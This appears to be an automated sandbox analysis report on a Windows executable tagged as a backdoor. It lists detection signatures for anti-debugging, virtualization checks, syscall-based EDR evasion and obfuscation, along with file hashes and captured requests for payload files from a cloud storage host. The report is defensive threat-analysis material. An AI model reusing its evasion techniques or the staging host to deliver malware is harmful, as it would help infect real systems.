Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1387457-38765948.15.exe

Overview

General Information

Sample name:1387457-38765948.15.exe
Analysis ID:1589380
MD5:947cd5df10d540b879c037c1cb519e63
SHA1:8e4f326d08b675c077dc1d19246bac5eaa0f73dc
SHA256:29f92fd013bdfc23e6b1a088f68b7bf4acf423bcc440d0ff49ac0079a38c5072
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Searches for specific processes (likely to inject)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 1387457-38765948.15.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\1387457-38765948.15.exe" MD5: 947CD5DF10D540B879C037C1CB519E63)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 1387457-38765948.15.exeVirustotal: Detection: 8%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 47.101.26.25:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: Binary string: C:\BuildAgent\work\897482836e9bb448\_bin\Release\ps64ldr.pdb source: 1387457-38765948.15.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_0000000140004094 GetModuleFileNameW,StrCpyW,PathAppendW,StrCatW,FindFirstFileW,0_2_0000000140004094
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_00000001400042D0 StrCpyW,PathAppendW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,FreeLibrary,StrCpyW,FindNextFileW,FindClose,FindFirstFileW,StrCmpIW,StrCpyW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,StrCpyW,StrCpyW,PathAppendW,0_2_00000001400042D0
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_000000014000AB44 FindFirstFileExW,0_2_000000014000AB44
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1387457-38765948.15.exeCode function: 0_2_005AFA05 InternetOpenA,InternetOpenUrlA,InternetReadFile,0_2_005AFA05
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: jcoiw1.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: jcoiw1.oss-cn-shanghai.aliyuncs.com
Source: 1387457-38765948.15.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 1387457-38765948.15.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 1387457-38765948.15.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 1387457-38765948.15.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: 1387457-38765948.15.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 1387457-38765948.15.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 1387457-38765948.15.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 1387457-38765948.15.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 1387457-38765948.15.exeString found in binary or memory: http://ocsp.digicert.com0A
Source: 1387457-38765948.15.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: 1387457-38765948.15.exeString found in binary or memory: http://ocsp.digicert.com0X
Source: 1387457-38765948.15.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: 1387457-38765948.15.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 1387457-38765948.15.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 1387457-38765948.15.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: c4wtKa.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jcoiw1.oss-cn-shanghai.aliyuncs.com/
